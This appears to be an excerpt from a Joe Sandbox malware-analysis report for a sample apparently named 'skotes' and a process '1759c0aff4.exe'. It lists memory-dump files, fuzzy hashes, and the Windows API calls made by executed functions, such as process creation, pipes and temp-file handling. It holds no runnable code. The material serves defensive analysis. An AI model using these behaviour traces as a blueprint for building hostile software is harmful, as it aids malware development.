Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: b67bd336fbe811090e2c68887c1820711d55ffb69af978454e609a2fb036aa1a
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 12B16732D002A99FDB15CF28D8817BEBFE5FF45340F25416AE845EB242D6349D81CBA1

Function 007F2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 007F2F5F
__Mtx_unlock.LIBCPMT ref: 007F2FCC
__Mtx_unlock.LIBCPMT ref: 007F30F5
__Mtx_unlock.LIBCPMT ref: 007F319B

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 1805acf8e0da71b2fdef9f4b3d6ba45121ee23f4d7ef3c80deb6bcb609c7552a
Instruction ID: f05490d3da8204260668f15fd8e016eefe485fc98b78ed1e6711c11e04ff8239
Opcode Fuzzy Hash: 1805acf8e0da71b2fdef9f4b3d6ba45121ee23f4d7ef3c80deb6bcb609c7552a
Instruction Fuzzy Hash: FBA1D2709016099FDB20DF68CD44B6AB7A8FF15310F04422AE915D7391EB39EA04CB92

Analysis Process: 1759c0aff4.exePID: 7964, Parent PID: 7768COMMON

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	34

Executed Functions

Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(02490000,00000000,?,?), ref: 0040E967

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E

Strings

Kernel32.DLL, xrefs: 0040ADF3
GetLongPathNameW, xrefs: 0040AE06

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
Opcode Fuzzy Hash: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD

Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395
memorypipesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00409A69
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
wcslen.MSVCRT ref: 00409C2A
wcslen.MSVCRT ref: 00409C38
HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
wcscpy.MSVCRT ref: 00409C6A
wcscat.MSVCRT ref: 00409C71
wcscat.MSVCRT ref: 00409C7C
wcscpy.MSVCRT ref: 00409C88
wcscat.MSVCRT ref: 00409CA3
wcscat.MSVCRT ref: 00409CB0
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
wcslen.MSVCRT ref: 00409E04
wcscpy.MSVCRT ref: 00409E2A
memset.MSVCRT ref: 00409E56
ShellExecuteExW.SHELL32 ref: 00409EB3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB

Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5

HeapFree.KERNEL32(00000000,?), ref: 00409F37

Strings

$0A, xrefs: 00409C0E
x, xrefs: 00409DEC

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
String ID: $0A$x
API String ID: 550696126-3693508903
Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A

Function 00401000 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 108
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7

Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9

Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691

Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D

Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502

Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB

Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0

Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1

SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03

ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011B6
HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB

Strings

.pA, xrefs: 00401085
|pA, xrefs: 00401044
:pA, xrefs: 0040112D

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonConsoleControlsCtrlDestroyEnumHandlerInitLoadModuleResourceTypes
String ID: .pA$:pA$|pA
API String ID: 1974305647-3272395972
Opcode ID: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
Opcode Fuzzy Hash: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F

Function 0040196C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02490000,00000000,?,?), ref: 0040E5BC

Strings

$pA, xrefs: 00401A84
$pA, xrefs: 00401B3D
$pA, xrefs: 00401AD9
$pA, xrefs: 00401A31

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID: $pA$$pA$$pA$$pA
API String ID: 368575804-1531182785
Opcode ID: 417cfe909ad584d3d84b117594ea6d6ab06f79ec2e3b7b64df38e28ad1b69bb8
Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
Opcode Fuzzy Hash: 417cfe909ad584d3d84b117594ea6d6ab06f79ec2e3b7b64df38e28ad1b69bb8
Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E

Function 0040B140 Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D

Function 0040DE99 Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,76ED5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
